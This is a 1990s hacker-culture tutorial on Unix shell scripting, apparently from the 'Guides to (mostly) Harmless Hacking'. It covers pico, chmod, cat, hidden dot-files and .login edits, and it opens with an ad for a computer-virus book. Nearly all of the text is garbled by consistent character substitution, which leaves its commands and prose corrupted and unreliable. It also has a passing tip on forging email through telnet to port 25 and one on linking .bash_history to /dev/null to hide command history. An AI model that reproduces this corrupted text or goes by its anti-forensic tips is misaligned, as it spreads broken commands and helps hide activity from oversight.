:Giant Black Book of /om.uter Ciruses: by 2r& 6ark 7udwig( *merican 3agle +ublications& #his book will also teach you how to write the most deadly <iruses on the .lanet ?? or .rograms to fight them ;ou can order it from htt.:IIwww&ama>on&com& Warning?? in order to fully a..reciate this book( you ha<e to know assembly language for DM'DE /+0s& But it is the most electrifying com.uter manual 1 ha<e e<er read )))))))))))))))))))))))))))))))))))))))))))))))))))))))) #hat is the heart of the hacker s.irit& 1f you are dri<en to do more and greater things than your =ob or school asks of you( you are a real hacker& 8ode kiddies who think breaking into com.uters and ty.ing f))) e<ery third word while on 15/ are not hackers& #hey are small?time .unks and <andals& But if you as.ire to become a true hacker( you will become a .rogrammer( and reach for the stars with your code& What 1s Shell +rogramming? 1f you ha<e been following the earlier Guides to !mostly$ Harmless Hacking !G#6HH$( you are already familiar with many fun 0ni' commands& Shell .rogramming is writing a file that holds a se@uence of 0ni' commands( which you can run in your shell account by ty.ing in only one line& )))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: 2on't know what a shell account is? 0ni' lea<es you scratching your head? ;ou )must) ha<e a shell account to learn shell .rogramming& ;ou can get one for free at htt.:IIsdf&lonestar&org& Rust set u. a +++ connection and telnet into 7onestar for your 0ni' fun Howe<er( 7onestar doesn't allow you to telnet out& Hor a full ser<ice shell account( check out htt.:IIrtEE&com& ;es #hey ha<e ssh logins Hor details on how to use a shell account and instructions on lots of fun 0ni' commands( see the G#6HHs on shell accounts at htt.:IItechbroker&comIha..yhacker&html& )))))))))))))))))))))))))))))))))))))))))))))))))) 1f you are familiar with 24S( you may ha<e already done something similar to shell .rogramming: 24S batch files& #he basic idea is that you write a series of 24S commands and sa<e them with a file that ends with the e'tension :bat&:

Hor e'am.le( you might name your batch file :myfile&bat&: #hen any time you want to run it( you =ust ty.e :myfile: and it runs all the commands inside that file& !"ote: if you are in a different directory from myfile&bat( you either ha<e to tell your com.uter where to look for it with a :.ath: command( or by ty.ing in the entire .ath( for e'am.le :c:Tmy.rogramsTmyfile&:$ 0ni' ?? an o.erating system that was created long before 24S ?? can do something <ery similar to a 24S batch file& 1nstead of ty.ing 0ni' commands one by one e<ery time you need them( you can write a shell scri.t that automatically e'ecutes that se@uence& #hen you sa<e it as a file with .ermissions that make it e'ecutable& ))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: :3'ecutable: doesn't mean the com.uter goes out and murders your .oor file& 1t means that when you ty.e the name of that file( the com.uter looks inside and does what your file tells it to do& :+ermissions: mean what can be done by who with a file& Hor e'am.le( you could set the .ermissions on your shell account file so that only someone in your account could e'ecute it& 4r you could make it so anyone in the world could run !e'ecute$ it ?? something you usually do with the files in your Web site( so that anyone who surfs in may read them& ))))))))))))))))))))))))))))))))))))))))))))))))))) But there is one huge difference between 24S and 0ni' commands& 1n 24S( the commands :mkdir: and :68215: do e'actly the same thing& 1n 0ni'( they would be two totally different commands& Be absolutely careful in this lesson to ty.e all commands in lower case !small$ letters( or this stuff will not work& How to /reate and 5un a Scri.t Why are we starting with shell scri.t .rogramming? #he reason is that they are easy& Honest( they )are) easy& So easy( there are se<eral ways to make them& Hirst( let's walk though the +ico way to create a sim.le scri.t& ,$ 4.en an editor .rogram& We'll use the easiest one: +ico& *t the .rom.t in your shell account( sim.ly ty.e in :.ico hack.hile&: !:Hackfile: will be the

name of the scri.t you will create& 1f you don't like that name( o.en +ico with the name you like( for e'am.le :.ico myfilename&:$ #his brings u. a screen that looks a lot like the +ine email .rogram's :com.ose mail: screen& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il genius ti.: 1f your shell account is half?way decent( you will ha<e +ine and it will allow you to choose whate<er editor you want for com.osing email& 2efault is +ico& But you may configure it to use other editors such as the far more .owerful <i or emacs& Rust go to the main menu on +ine( then to Setu.( then to /onfigure( then scroll down almost to the end of all the o.tions& #here will be a line :editor W .ico&: +ut in your fa<orite editor 1f you regularly use +ine to com.ose email( you will kee. in .ractice by using its editor( making it much easier to write .rograms& )))))))))))))))))))))))))))))))))))))))))))))))))))))))) Here's what your +ico screen should look like: 0W +1/4!tm$ -&9 Hile: hack.hile

Y "ew file Z BG Get Hel. B4 Write4ut B5 5ead Hile B; +re< +g B8 /ut #e't B/ /ur +os BU 3'it BR Rustify BW Where is BC "e't +g B0 0n/ut #e'tB# #o S.ell *t the bottom is some fast hel.( a list of commonly used +ico commands& #hat :B: thingy means to hold down the control key while hitting the letter of the al.habet that follows& Besides these commands( some others that it hel.s to know for +ico are: Be mo<es the cursor to the end of a line Ba mo<es the cursor to the beginning of a line Bd deletes a character Bf mo<es the cursor forward !or use the ?V arrow key if it works$ Bb mo<es the cursor backward !or use the ^? arrow key if it works$ B. mo<es the cursor u. !or use the u. arrow key if it works$ Bn mo<es the cursor down !or use the down arrow key if it works$

Bt checks s.elling -$ Write in some 0ni' commands& Here are some fun ones: echo 1 am a .rogrammer and one heck of a hacker echo #oday 1 am going to echo O, O- O% OG O5 OE OK OD O9 %$ "ow e'it +ico& Hold down the control key while .ressing :'&: +ico will ask you if you want to sa<e the file& Hit the :y: key to sa<e& 1t will ask you whether you want to sa<e it with the name :hack.hile&: 0nless your change your mind( =ust hit the :enter: key and you are done& G$ "e't make it e'ecutable& 4n most systems( you can do this by ty.ing :chmod KMM hack.hile&: 4n some com.uters the command :chmod X' hack.hile: will work& 4n other com.uters you might ha<e to write a line in your shell scri.t :9 IbinIbash: !or :9 IbinItcsh: or :9 IbinIcsh: etc& de.ending on the .ath to whate<er shell you are using$ to make it work& Sorry to be so com.licated on this instruction( but there are a lot of different kinds of 0ni' and 0ni' shells out there& Groan& )))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: #hat :chmod: command sets .ermissions& 6aking a file e'ecutable is only one of the many things that magical command does& 1t also controls who can e'ecute it( who can read it( and who can write it& 2amian Bates of 5tEE 1nternet .oints out that you could set the .ermissions so only you could e'ecute that shell scri.t by ty.ing :chmod uXr' filename: !uWyou$& 1f you are in a 0ni' :grou.(: you could allow your grou. to e'ecute it by ty.ing :chmod gXr' filename: !gWgrou.$ or you could gi<e e<eryone else e'ecute .ermissions by ty.ing :chmod oXr' filename: !oWother$& *ny of these can be done in combination such as :chmod ugXr' filename !user and grou. can read and e'ecute but not write$ or :chmod g?rw' filename: 1f you hate ty.ing all that stuff( you can use numbers as in :chmod KMM(: which gi<es you( and only you read( write and e'ecute .ermission& #o add .ermission to read and e'ecute( but not write( to e<eryone else( use :chmod K55&: #o learn more on how to use the number chmod commands( use the command

:man chmod&: ))))))))))))))))))))))))))))))))))))))))))))))))))))))) 5$ "ow ty.e in: :hack.hile forge email from Santa /laus&: +ress :enter: and you will see on your screen: :1 am a .rogrammer and one heck of a hacker #oday 1 am going to forge email from Santa /laus&: +retty cool( huh? What that last echo command does is find the first word you ty.ed after the :hack.hile: command( which is held in the memory location O,( the second word in O-( and so on& 0nlike more so.histicated .rogramming languages( you don't need to set u. those dollar sign <ariables in ad<ance ?? the stuff you ty.e on the command line after the name of the scri.t automatically goes into those memory locations "ow su..ose you want a scri.t to actually forge email from Santa /laus& 0nfortunately( this is where you learn the limitations of shell scri.ts& ;ou can .ut in the command :telnet foobar&com -5: and be ready to forge email& But if the ne't command in your shell scri.t is :mail from: santaJnorth&.ole&com(: it =ust won't ha..en& #he .roblem is that you are no longer in your 0ni' shell& ;ou now are running a mail .rogram on foobar&com( which does not bring u. the rest in your se@uence of shell commands& But hel. is on the way& #he .rogramming languages of +erl and / will do the =ob for you much more easily than a shell scri.t& 6ore on these in later Guides( 1 .romise How about more fun ways to make shell scri.ts? Shell Scri.ts on the Hly 1n a rush? 2o you always do things .erfectly? 1f so( try the :cat: command to create shell scri.ts& Here's an e'am.le of a useful one& #y.e in: cat V list ls ?al8_more w_more #hen hold down the control key while hitting the letter :d&: #his will

automatically end the :cat: command while sa<ing the commands :ls ?al8_ more: and :w_more: in the file :list&: #hen make it e'ecutable with the command: :chmod KMM list&: !1f chmod KMM doesn't work on your system( try the alternati<e ways to make it e'ecutable in G$ abo<e&$ "ow( whene<er you want to see e<erything you could e<er want to see about your files( followed by a list of info on whoe<er else is also logged into shell accounts at the 0ni' bo' you use( =ust ty.e in the command :list&: #his will gi<e you something like: total ,-K drw'?????' D c.m drw'r?'r?'9D5 root ?rw??????? , c.m ?rw??????? , c.m lrw'rw'rw' , c.m ?rw?r??r?? , c.m !sni.$ %:M,.m u. 5 days( E:GD( 9 users( load a<erage: ,&DK( ,&%M( ,&MD 0ser tty loginJ idle R/+0 +/+0 what .hill tty.M -:%9.m , ,, ?csh flattman tty., -:-K.m G G tf k=herman tty.- ,:,%.m ,:G% telnet ft.&fubar&com c.m tty.G ,:MD.m ,% w =ohn. tty.5 Sat E.m , ,:-9 K ?tcsh k=herman tty.E ,:,5.m ,:G% telnet fubar&com k=herman tty.D ,:,E.m ,:G% IbinIcsh IusrIlocalIbinIcmenu momsho. tty.9 -:5M.m ,M IusrIlocalIbinI.ine swit tty.a 9:5Eam G:-M G, ?csh =oy tty.c %:MM.m , ?csh ))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: What does all that stuff mean? Sorry( this is an ad<anced G#6HH( so all 1'm going to tell you is to gi<e the commands :man ls: and :man who: to find out all this stuff& 48( 48( 1'm sorry( here's a little more hel.& #he :_: means :.i.e&: When you ,5%E 2ec -D ,G:%K & ,K9-M 2ec -E ,K:5E && M *ug -K MD:MK &addressbook --D5 *ug -K MD:MK &addressbook&lu 9 4ct -K ,5:%5 &bashFhistory ?V Ide<Inull ,D5E 4ct D M9:GK &cshrc

ha<e two commands on either side of a .i.e command( this makes the out.ut of the command on the left hand side of the :_: .i.e into the command on the right hand side& So :w_more: tells your com.uter to do the command :w: and .i.e its out.ut to the command :more&: #hen :more: dis.lays the out.ut on your monitor one screen at a time( waiting for you to hit the s.ace bar before dis.laying the ne't screen& What does :lrw'rw'rw' , c.m 9 4ct -K ,5:%5 &bashFhistory ?V Ide<Inull: mean? :l: means it is a linked file& #he first set of rw''s mean 1 !the owner of the account$ may read( write( and e'ecute this file& #he second rw' means my grou. may also read( write and e'ecute& #he last set means anyone in the world may read( write and e'ecute this file& But since it's em.ty( and will always stay em.ty( too bad( kode kiddies& ))))))))))))))))))))))))))))))))))))))))))))))))))) ))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il genius ti.: 1n case you saw that su..osed bash history file of mine some ha'ors were making .hun of on some email lists( here's two ways you can tell it was faked and they were seriously deficient in 0ni' knowledge& a$ See that funny notation abo<e( :bashFhistory ?V de<Inull? 6y &bashFhistory has been linked to de<Inull !de<Inull means :de<ice null: which is a fancy way of saying e<erything goes to bit hea<en ne<er to be seen again$ since 4ct& 9( ,99K ?? long before some soo.er genius emailed around that fake file Here's how you can make your bash history disa..ear& Sim.ly gi<e the command :ln ?s Ide<Inull ]I&bashFhistory&: b$ 1f you ha<e the bash shell( and ha<en't linked it yet to de<Inull( get into it and use the :talk: command to chat with someone for awhile& #hen gi<e the command :more &bashFhistory&: ;ou will see that unlike that su..osed bash history file of mine( the stuff you ty.e in during a :talk: session does not a..ear in the &bashFhistory file& #he guy who faked it didn't know this 3ither that( or he did know( and .ut that in to trick the .eo.le who would read it and flame me into re<ealing their ignorance& #he guys who got caught by this trick tried to get out of their embarrassing s.ot by claiming that a buffer o<erflow could make the contents of a talk session turn u. in a bash history file& ;eah( and yesterday they saw 3l<is +resley at a grocery story( too& ))))))))))))))))))))))))))))))))))))))))))))))))))) Slightly Stealthy Scri.ts

"ow su..ose you are worried about really clueless kode kiddies getting into your shell account& Belie<e it or not( many .eo.le who break into com.uters are almost totally ignorant of 0ni'& Hor e'am.le( at 2ef /on C a friend( 2aniel( conducted an informal .oll& He asked do>ens of attendees if they knew the :cat: command& He found that o<er half the .eo.le there had ne<er e<en heard of it Well( )you) know at least one way to use :cat: now *nother e'am.le of ha'or 0ni' cluelessness was a fellow who broke into my shell account and .lanted a #ro=an named :ls&: His idea was that ne't time 1 looked at my files using the 0ni' ls command( his ls would e'ecute instead and trash my account& But he forgot to gi<e the command :chmod KMM ls&: So it ne<er ran( .oor baby& )))))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il genius ti.: 2amian ad<ises :"3C35 .ut '&' !the current working directory or cwd$ in your .ath 1f you really want :&: in your .ath( make sure it is the last one& #hen( if a #ro=an like ls is in your current directory( the FrealF ls will be used first& Set your umask !umask is the command that automatically set .ermissions on all files you create( unless you s.ecify otherwise$ to something more secure than M--( 1 .ersonally use MKK& "e<er gi<e grou. or other write access to your directory and be leery of what others can read&: Hor your reading en=oyment( use the commands :man chmod: and :man umask: to get all the gory details& )))))))))))))))))))))))))))))))))))))))))))))))))))))) Here are ways to make shell scri.ts that the a<erage clueless .erson who breaks into a com.uter won't be able to run& Hirst( when you name your scri.t( .ut a .eriod in front of the name& Hor e'am.le( call it :&secretscri.t:& What that .eriod does is make it a hidden file& Some kode kiddies don't know how to look for hidden files with the command :ls ?a&: *fter you make your scri.t( don't gi<e the :chmod KMM: command& Rust lea<e it alone& #hen when you want to e'ecute it( gi<e the command :sh hack.hile: !substituting for :hack.hile: the name of whate<er scri.t you wish to e'ecute$& 1t will e'ecute e<en though you ne<er ga<e that chmod KMM command

What you ha<e done with the :sh: command is launch a tem.orary new 0ni' shell( and then send into that shell the commands of your scri.t& Here's a cool e'am.le& 6ake this scri.t: cat V &lookeehere who_more netstat_more 5emember to sa<e this scri.t by holding down the control key while hitting the letter :d:& "ow try the command: :&lookeehere : ;ou should get back something that looks like: bash: &I&lookeehere : +ermission denied #hat's what will stum. the a<erage kode kiddie( .resuming he can e<en find that scri.t in the first .lace& "ow try the command :sh &lookeehere : *ll of a sudden you get screen after screen of really interesting stuff ;our 1nternet Ser<ice .ro<ider may ha<e disabled some of the commands of this Guide& 4r it may ha<e =ust hidden them in directories that you can get to if you know how to look for them& Hor e'am.le( if the :netstat: command doesn't work( gi<e the command :whereis netstat&: or else :locate netstat&: 1f( for e'am.le( you were to find it in IusrIbin( you can make that command work with :IusrIbinInetstat: in your scri.t& 1f neither the whereis or locate commands find it for you( if you are a newbie( you ha<e two choices& 3ither get a better shell account( or talk your sysadmin into changing .ermissions on that file so you can e'ecute it& 6any sysadmins will hel. you out this way ?? that is( they will hel. if when they check their syslog files they don't find e<idence of you trying to break into or trash com.uters& "eat trick: take your sysadmin to a fancy restaurant and wait to ask him for access to 3C35; 0ni' command until after you ha<e .aid for his meal& ))))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il genius ti.: ;our sysadmin won't let you run your fa<orite 0ni' commands? 2on't gro<el /om.ile your own 6ost 1S+s don't mind if you kee.

and use your fa<orite 0ni' stuff in your own account& Says 2amian( :1 tend to kee. my own binaries in ]IbinI !6y home directory slash bin$ and .ut that in my .ath& !With the directory being KMM or drw'?????? of course$&: Where can you get your own? #ry htt.:IIsunsite&unc&eduI.ubI7inu'Iwelcome&html ))))))))))))))))))))))))))))))))))))))))))))))))))))) "ow it's time to really think about what you can do with scri.ts& ;es( a shell scri.t can take a com.le' task such as im.ressing the heck out of your friends( and make it .ossible for you to do by gi<ing =ust one command .er cool stunt& 1f you are a bit of a .rankster( you could create a bunch of scri.ts and use them to make your friends think you ha<e a s.ecial( su.er du.er o.erating system& *nd in fact you really will( honestly( be in control of the most s.ecial( wonderful o.erating system on the .lanet& #he beauty and .ower of 0ni' is that it is so easy to customi>e it to do anything and e<erything Windows no 0ni' yes )))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il Genius ti.: Bring u. the file &login in +ico& 1t controls lots of what ha..ens in your shell account& Want to edit it? ;ou could totally screw u. your account by changing &login& But you are a hacker( so you aren't afraid( right? Besides( if you mess u. your shell account( you will force yourself to either learn 0ni' real fast so you can fi' it again( or else make friends with tech su..ort at your 1S+ as your try to e'.lain why you accidentally ma..ed the letter :e: to mean :erase&: !1 did that once& Hey( no one's .erfect $ Hor e'am.le( do you ha<e to .ut u. with some babysitter menu e<ery time you log in? 2o you see something that looks like :IusrIlocalIbinImenu: in &login? +ut a :9: in front of that command !and any other ones you want to .ut to slee.$ and it won't e'ecute when you login& #hen if you decide you are sorry you turned it off( =ust remo<e the :9: and that command will work again& 2amian adds :4f great im.ortance to newbies and a sign of great intelligence in ad<anced 0ni' gurus is backing u. before you screw it u.( i&e&( in your .ico of &cshrc& #heir command lines should contain: mkdir &trashAchmod KMM &trashAc. &cshrc &trashA .ico &cshrc& :4r( make the following alias in your &cshrc after creating your

'&trash'directory: alias backu. 'c. T O ]I&trash' :When you ne't source the &cshrc( you =ust ty.e 'backu. filename' and it will be co.ied into the &trash directory in case you need it later& :6odify the startu. scri.t( sa<e the changes and then telnet in a second time to see if it works& 1f it doesn't( fi' it or 'c. ]I&trashI&cshrc ]'& 1 don't recommend you 'source' the newly modified file because if it's screwed( so are you& 1t's always best to kee. one session untarnished( =ust in case& 1f it works 48 on your -nd login( then you can 'source &cshrcArehashA' in your first window to take ad<antage of the changes made&: ))))))))))))))))))))))))))))))))))))))))))))))))))))))) 48( now how about =ust cutting loose and .laying with scri.ts? See what wonderful things you can do with them& #hat's what being a hacker is all about( right? *nd thanks to 2amian Bates( great fan of the Bastard 4.erator from Hell( for re<iewing and contributing to this Guide& /heck out his Web site at htt.:IIbofh&mysite&orgIdamian& +arental discretion ad<ised:$ :#here is no way you're describing our system( she could ne<er ha<e gotten .ast our security& But 1'm going to find her and see that she's .rosecuted &&& she broke the law( and she's going to .ay : +resident of :Blah Blah Bank: ??VVV 2oes anybody 37S3 see a small discre.ancy here ???????